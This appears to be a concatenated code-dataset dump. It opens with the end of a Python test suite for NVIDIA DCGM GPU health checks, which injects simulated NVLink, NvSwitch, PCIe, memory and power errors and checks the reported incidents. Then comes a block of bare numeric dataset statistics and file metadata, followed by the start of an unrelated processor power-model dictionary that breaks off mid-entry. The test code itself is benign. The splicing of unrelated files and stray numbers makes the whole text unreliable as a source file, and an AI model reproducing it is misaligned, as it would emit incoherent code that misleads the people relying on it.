ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId,
dcgm_fields.DCGM_FI_DEV_NVLINK_CRC_FLIT_ERROR_COUNT_TOTAL,
100, 10)
assert (ret == dcgm_structs.DCGM_ST_OK)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
assert (responseV4.incidentCount == 1)
assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_NVLINK)
assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_NVLINK_ERROR_THRESHOLD)
assert (responseV4.incidents[0].health == dcgm_structs.DCGM_HEALTH_RESULT_WARN)
def helper_nvlink_check_fatal_errors(handle, gpuIds):
test_utils.skip_test_if_any_nvlinks_down(handle)
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetEmptyGroup("test1")
groupObj.AddGpu(gpuIds[0])
gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
gpuId = gpuIds[0]
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_NVLINK
groupObj.health.Set(newSystems)
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId,
dcgm_fields.DCGM_FI_DEV_NVLINK_RECOVERY_ERROR_COUNT_TOTAL,
0, -50)
assert (ret == dcgm_structs.DCGM_ST_OK)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId,
dcgm_fields.DCGM_FI_DEV_NVLINK_RECOVERY_ERROR_COUNT_TOTAL,
1, -50)
assert (ret == dcgm_structs.DCGM_ST_OK)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
assert (responseV4.overallHealth == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
assert (responseV4.incidentCount == 1)
assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_NVLINK)
assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_NVLINK_ERROR_CRITICAL)
assert (responseV4.incidents[0].health == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_standalone_nvlink_fatal(handle, gpuIds):
helper_nvlink_check_fatal_errors(handle, gpuIds)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_embedded_nvlink_fatal(handle, gpuIds):
helper_nvlink_check_fatal_errors(handle, gpuIds)
def helper_nvlink_crc_fatal_threshold(handle, gpuIds):
test_utils.skip_test_if_any_nvlinks_down(handle)
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetEmptyGroup("test1")
groupObj.AddGpu(gpuIds[0])
gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
gpuId = gpuIds[0]
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_NVLINK
groupObj.health.Set(newSystems)
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId,
dcgm_fields.DCGM_FI_DEV_NVLINK_CRC_FLIT_ERROR_COUNT_TOTAL,
0, -50)
assert (ret == dcgm_structs.DCGM_ST_OK)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
# Trigger a failure by having more than 100 CRC errors per second
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId,
dcgm_fields.DCGM_FI_DEV_NVLINK_CRC_FLIT_ERROR_COUNT_TOTAL,
1000000, -20)
assert (ret == dcgm_structs.DCGM_ST_OK)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
assert (responseV4.overallHealth == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
assert (responseV4.incidentCount == 1)
assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_NVLINK)
assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_NVLINK_CRC_ERROR_THRESHOLD)
assert (responseV4.incidents[0].health == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_standalone_nvlink_crc_threshold(handle, gpuIds):
helper_nvlink_crc_fatal_threshold(handle, gpuIds)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_only_with_live_gpus()
def test_dcgm_embedded_nvlink_crc_threshold(handle, gpuIds):
helper_nvlink_crc_fatal_threshold(handle, gpuIds)
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_only_with_live_gpus()
def test_dcgm_standalone_health_large_groupid(handle, gpuIds):
"""
Verifies that a health check can run on a large groupId
This verifies the fix for bug 1868821
"""
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
#Make a bunch of groups and delete them right away so our next groupId is large
for i in range(100):
groupObj = systemObj.GetEmptyGroup("test_group_%d" % i)
groupObj.Delete()
groupObj = systemObj.GetEmptyGroup("test_good_group")
groupObj.AddGpu(gpuIds[0])
groupId = groupObj.GetId().value
assert groupId >= 100, "Expected groupId > 100. got %d" % groupObj.GetId()
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_ALL
#Any of these will throw an exception on error. Making it past these = success
groupObj.health.Set(newSystems)
systemObj.UpdateAllFields(True)
groupObj.health.Get()
groupObj.health.Check()
def helper_health_check_nvswitch_errors(handle, switchIds, fieldId, healthSystem, healthResult, errorCode):
"""
Verifies that a check error occurs when an error is injected
Checks for call errors are done in the bindings except dcgmClientHealthCheck
"""
#This test will fail if any NvLinks are down
test_utils.skip_test_if_any_nvlinks_down(handle)
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetEmptyGroup("test1")
switchId = switchIds[0]
groupObj.AddEntity(dcgm_fields.DCGM_FE_SWITCH, switchId)
newSystems = healthSystem
groupObj.health.Set(newSystems)
field = dcgm_structs_internal.c_dcgmInjectFieldValue_v1()
field.version = dcgm_structs_internal.dcgmInjectFieldValue_version1
field.fieldId = fieldId
field.status = 0
field.fieldType = ord(dcgm_fields.DCGM_FT_INT64)
field.ts = int((time.time()-5) * 1000000.0)
field.value.i64 = 0
ret = dcgm_agent_internal.dcgmInjectEntityFieldValue(handle, dcgm_fields.DCGM_FE_SWITCH,
switchId, field)
assert (ret == dcgm_structs.DCGM_ST_OK)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
field.ts = int((time.time()-50) * 1000000.0)
field.value.i64 = 0
ret = dcgm_agent_internal.dcgmInjectEntityFieldValue(handle, dcgm_fields.DCGM_FE_SWITCH,
switchId, field)
assert (ret == dcgm_structs.DCGM_ST_OK)
# we expect that there will be no data here
# inject an error into NvSwitch
field.ts = int((time.time() - 1) * 1000000.0) # set the injected data for a second ago
field.value.i64 = 5
ret = dcgm_agent_internal.dcgmInjectEntityFieldValue(handle, dcgm_fields.DCGM_FE_SWITCH,
switchId, field)
assert (ret == dcgm_structs.DCGM_ST_OK)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
assert (responseV4.incidentCount == 1)
assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_SWITCH)
assert (responseV4.incidents[0].entityInfo.entityId == switchId)
assert (responseV4.incidents[0].health == healthResult)
assert (responseV4.incidents[0].system == healthSystem)
assert (responseV4.incidents[0].error.code == errorCode)
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_with_injection_nvswitches()
def test_health_check_nvswitch_fatal_errors_standalone(handle, switchIds):
helper_health_check_nvswitch_errors(handle, switchIds,
dcgm_fields.DCGM_FI_DEV_NVSWITCH_FATAL_ERRORS,
dcgm_structs.DCGM_HEALTH_WATCH_NVSWITCH_FATAL,
dcgm_structs.DCGM_HEALTH_RESULT_FAIL,
dcgm_errors.DCGM_FR_NVSWITCH_FATAL_ERROR)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_with_injection_nvswitches()
def test_health_check_nvswitch_fatal_errors_embedded(handle, switchIds):
helper_health_check_nvswitch_errors(handle, switchIds,
dcgm_fields.DCGM_FI_DEV_NVSWITCH_FATAL_ERRORS,
dcgm_structs.DCGM_HEALTH_WATCH_NVSWITCH_FATAL,
dcgm_structs.DCGM_HEALTH_RESULT_FAIL,
dcgm_errors.DCGM_FR_NVSWITCH_FATAL_ERROR)
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_with_injection_nvswitches()
def test_health_check_nvswitch_nonfatal_errors_standalone(handle, switchIds):
helper_health_check_nvswitch_errors(handle, switchIds,
dcgm_fields.DCGM_FI_DEV_NVSWITCH_NON_FATAL_ERRORS,
dcgm_structs.DCGM_HEALTH_WATCH_NVSWITCH_NONFATAL,
dcgm_structs.DCGM_HEALTH_RESULT_WARN,
dcgm_errors.DCGM_FR_NVSWITCH_NON_FATAL_ERROR)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_with_injection_nvswitches()
def test_health_check_nvswitch_nonfatal_errors_embedded(handle, switchIds):
helper_health_check_nvswitch_errors(handle, switchIds,
dcgm_fields.DCGM_FI_DEV_NVSWITCH_NON_FATAL_ERRORS,
dcgm_structs.DCGM_HEALTH_WATCH_NVSWITCH_NONFATAL,
dcgm_structs.DCGM_HEALTH_RESULT_WARN,
dcgm_errors.DCGM_FR_NVSWITCH_NON_FATAL_ERROR)
def helper_health_check_nvlink_link_down_gpu(handle, gpuIds):
"""
Verifies that a check error occurs when a NvLink link is set to broken
"""
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetEmptyGroup("test1")
groupObj.AddGpu(gpuIds[0])
gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
gpuId = gpuIds[0]
#Set all links of our injected GPU to Up
for linkId in range(dcgm_structs.DCGM_NVLINK_MAX_LINKS_PER_GPU):
dcgm_agent_internal.dcgmSetEntityNvLinkLinkState(handle, dcgm_fields.DCGM_FE_GPU, gpuId, linkId, dcgm_structs.DcgmNvLinkLinkStateUp)
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_NVLINK
groupObj.health.Set(newSystems)
#By default, the health check should pass
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
assert responseV4.incidentCount == 0, "Expected no errors. Got %d errors" % responseV4.incidentCount
#Set a link to Down
linkId = 3
dcgm_agent_internal.dcgmSetEntityNvLinkLinkState(handle, dcgm_fields.DCGM_FE_GPU, gpuId, linkId, dcgm_structs.DcgmNvLinkLinkStateDown)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
logger.info("Health String: " + responseV4.incidents[0].error.msg)
assert (responseV4.incidentCount == 1)
assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_NVLINK)
assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_NVLINK_DOWN)
assert str(linkId) in (responseV4.incidents[0].error.msg), "Didn't find linkId %d in %s" % (linkId, responseV4.incidents[0].error.msg)
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_with_injection_gpus()
def test_health_check_nvlink_link_down_gpu_standalone(handle, gpuIds):
helper_health_check_nvlink_link_down_gpu(handle, gpuIds)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_with_injection_gpus()
def test_health_check_nvlink_link_down_gpu_embedded(handle, gpuIds):
helper_health_check_nvlink_link_down_gpu(handle, gpuIds)
def helper_health_check_nvlink_link_down_nvswitch(handle, switchIds):
"""
Verifies that a check error occurs when a NvLink link is set to broken
"""
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetEmptyGroup("test1")
switchId = switchIds[0]
groupObj.AddEntity(dcgm_fields.DCGM_FE_SWITCH, switchId)
linkId = 17
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_NVSWITCH_FATAL
groupObj.health.Set(newSystems)
#By default, the health check should pass
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
assert responseV4.incidentCount == 0, "Expected no errors. Got %d entities with errors: %s" % (responseV4.incidentCount, responseV4.incidents[0].error.msg)
#Set a link to Down
dcgm_agent_internal.dcgmSetEntityNvLinkLinkState(handle, dcgm_fields.DCGM_FE_SWITCH, switchId, linkId, dcgm_structs.DcgmNvLinkLinkStateDown)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
assert (responseV4.incidentCount == 1)
assert (responseV4.incidents[0].entityInfo.entityId == switchId)
assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_SWITCH)
assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_NVSWITCH_FATAL)
assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_NVLINK_DOWN)
assert str(linkId) in responseV4.incidents[0].error.msg, "Didn't find linkId %d in %s" % (linkId, responseV4.incidents[0].error.msg)
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_with_injection_nvswitches()
def test_health_check_nvlink_link_down_nvswitch_standalone(handle, switchIds):
helper_health_check_nvlink_link_down_nvswitch(handle, switchIds)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_with_injection_nvswitches()
def test_health_check_nvlink_link_down_nvswitch_embedded(handle, switchIds):
helper_health_check_nvlink_link_down_nvswitch(handle, switchIds)
def helper_health_check_multiple_failures(handle, gpuIds):
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetEmptyGroup("test1")
groupObj.AddGpu(gpuIds[0])
gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
gpuId = gpuIds[0]
# We are going to trigger two failures at the same time
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_PCIE | dcgm_structs.DCGM_HEALTH_WATCH_MEM
groupObj.health.Set(newSystems)
skip_test_if_unhealthy(groupObj)
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_PCIE_REPLAY_COUNTER,
0, -50)
assert (ret == dcgm_structs.DCGM_ST_OK)
# inject a PCI error and a memory error, and make sure we report both
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_ECC_DBE_VOL_TOTAL,
4, 100)
assert (ret == dcgm_structs.DCGM_ST_OK)
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_PCIE_REPLAY_COUNTER,
100, 100)
assert (ret == dcgm_structs.DCGM_ST_OK)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
assert (responseV4.incidentCount == 2)
assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
assert (responseV4.incidents[1].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
assert (responseV4.incidents[1].entityInfo.entityId == gpuId)
if responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_MEM:
# The memory error is in position 0 here
assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_VOLATILE_DBE_DETECTED)
# PCIE error is in position 1 here
assert (responseV4.incidents[1].system == dcgm_structs.DCGM_HEALTH_WATCH_PCIE)
assert (responseV4.incidents[1].error.code == dcgm_errors.DCGM_FR_PCI_REPLAY_RATE)
else:
assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_PCIE)
assert (responseV4.incidents[1].system == dcgm_structs.DCGM_HEALTH_WATCH_MEM)
# Mem is in position 1 now
assert (responseV4.incidents[1].error.code == dcgm_errors.DCGM_FR_VOLATILE_DBE_DETECTED)
assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_PCI_REPLAY_RATE)
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_with_injection_gpus()
def test_health_check_standalone_multiple_failures(handle, gpuIds):
helper_health_check_multiple_failures(handle, gpuIds)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_with_injection_gpus()
def test_health_check_embedded_multiple_failures(handle, gpuIds):
helper_health_check_multiple_failures(handle, gpuIds)
def helper_health_check_unreadable_power_usage(handle, gpuIds):
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetEmptyGroup("test1")
groupObj.AddGpu(gpuIds[0])
gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
gpuId = gpuIds[0]
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_POWER
groupObj.health.Set(newSystems)
ret = dcgm_internal_helpers.inject_field_value_fp64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_POWER_USAGE,
dcgmvalue.DCGM_FP64_BLANK, 50)
assert (ret == dcgm_structs.DCGM_ST_OK)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
assert (responseV4.incidentCount == 1)
assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_POWER)
assert (responseV4.incidents[0].health == dcgm_structs.DCGM_HEALTH_RESULT_WARN)
assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_POWER_UNREADABLE)
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_with_injection_gpus()
def test_health_check_standalone_unreadable_power_usage(handle, gpuIds):
helper_health_check_unreadable_power_usage(handle, gpuIds)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_with_injection_gpus()
def test_health_check_embedded_unreadable_power_usage(handle, gpuIds):
helper_health_check_unreadable_power_usage(handle, gpuIds)
def helper_health_set_version2(handle, gpuIds):
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetGroupWithGpuIds("test1", gpuIds)
watchInterval = 999999
maxKeepAge = 1234.5
maxKeepAgeUsec = int(maxKeepAge * 1000000)
fieldId = dcgm_fields.DCGM_FI_DEV_PCIE_REPLAY_COUNTER
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_PCIE
groupObj.health.Set(newSystems, watchInterval, maxKeepAge)
for gpuId in gpuIds:
cmfi = dcgm_agent_internal.dcgmGetCacheManagerFieldInfo(handle, gpuId, fieldId)
assert cmfi.flags & dcgm_structs_internal.DCGM_CMI_F_WATCHED, "x%X" % cmfi.flags
assert cmfi.monitorFrequencyUsec == watchInterval, "%d != %d" % (cmfi.monitorFrequencyUsec, watchInterval)
assert cmfi.maxAgeUsec == maxKeepAgeUsec, "%d != %d" % (cmfi.maxAgeUsec, maxKeepAgeUsec)
@test_utils.run_with_standalone_host_engine(120)
@test_utils.run_with_initialized_client()
@test_utils.run_with_injection_gpus(2)
def test_health_set_version2_standalone(handle, gpuIds):
helper_health_set_version2(handle, gpuIds)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_with_injection_gpus(2)
def test_health_set_version2_embedded(handle, gpuIds):
helper_health_set_version2(handle, gpuIds)
def helper_test_dcgm_health_check_uncontained_errors(handle, gpuIds):
"""
Verifies that the health check will fail if we inject an uncontained error
"""
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetEmptyGroup("test1")
groupObj.AddGpu(gpuIds[0])
gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
gpuId = gpuIds[0]
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_MEM
groupObj.health.Set(newSystems)
skip_test_if_unhealthy(groupObj)
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_XID_ERRORS,
95, 0) # set the injected data to now
assert (ret == dcgm_structs.DCGM_ST_OK)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
assert (responseV4.overallHealth == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
assert (responseV4.incidentCount == 1)
assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_MEM)
assert (responseV4.incidents[0].health == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_UNCONTAINED_ERROR)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_with_injection_gpus(2)
def test_dcgm_health_check_uncontained_errors(handle, gpuIds):
helper_test_dcgm_health_check_uncontained_errors(handle, gpuIds)
def helper_test_dcgm_health_check_row_remap_failure(handle, gpuIds):
"""
Verifies that the health check will fail if we inject an uncontained error
"""
handleObj = pydcgm.DcgmHandle(handle=handle)
systemObj = handleObj.GetSystem()
groupObj = systemObj.GetEmptyGroup("test1")
groupObj.AddGpu(gpuIds[0])
gpuIds = groupObj.GetGpuIds() #Limit gpuIds to GPUs in our group
gpuId = gpuIds[0]
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_MEM
groupObj.health.Set(newSystems)
skip_test_if_unhealthy(groupObj)
ret = dcgm_internal_helpers.inject_field_value_i64(handle, gpuId, dcgm_fields.DCGM_FI_DEV_ROW_REMAP_FAILURE,
1, 0) # set the injected data to now
assert (ret == dcgm_structs.DCGM_ST_OK)
responseV4 = groupObj.health.Check(dcgm_structs.dcgmHealthResponse_version4)
assert (responseV4.overallHealth == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
assert (responseV4.incidentCount == 1)
assert (responseV4.incidents[0].entityInfo.entityId == gpuId)
assert (responseV4.incidents[0].entityInfo.entityGroupId == dcgm_fields.DCGM_FE_GPU)
assert (responseV4.incidents[0].system == dcgm_structs.DCGM_HEALTH_WATCH_MEM)
assert (responseV4.incidents[0].health == dcgm_structs.DCGM_HEALTH_RESULT_FAIL)
assert (responseV4.incidents[0].error.code == dcgm_errors.DCGM_FR_ROW_REMAP_FAILURE)
@test_utils.run_with_embedded_host_engine()
@test_utils.run_with_injection_gpus(2)
def test_dcgm_health_check_row_remap_failure(handle, gpuIds):
helper_test_dcgm_health_check_row_remap_failure(handle, gpuIds)
| 45.498797
| 159
| 0.756896
| 7,485
| 56,737
| 5.382766
| 0.060254
| 0.04696
| 0.049144
| 0.040109
| 0.881732
| 0.867709
| 0.855324
| 0.842815
| 0.828965
| 0.803599
| 0
| 0.017645
| 0.163932
| 56,737
| 1,246
| 160
| 45.535313
| 0.83171
| 0.124152
| 0
| 0.731678
| 0
| 0
| 0.0128
| 0.000895
| 0
| 0
| 0
| 0
| 0.202128
| 1
| 0.088652
| false
| 0.004728
| 0.018913
| 0
| 0.108747
| 0.001182
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
534e651110d0282604cd43c274b22eae055619ea
| 68,580
|
py
|
Python
|
scripts/sampleOutputs/bkup/cmp_namdgromacscalculixcactusADM_reverse/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
scripts/sampleOutputs/bkup/cmp_namdgromacscalculixcactusADM_reverse/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
scripts/sampleOutputs/bkup/cmp_namdgromacscalculixcactusADM_reverse/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.315901,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.450812,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.8361,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.653476,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 1.13158,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.648995,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 2.43406,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.364435,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 8.81851,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.346878,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.023689,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.284279,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.175195,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.631157,
'Execution Unit/Register Files/Runtime Dynamic': 0.198884,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
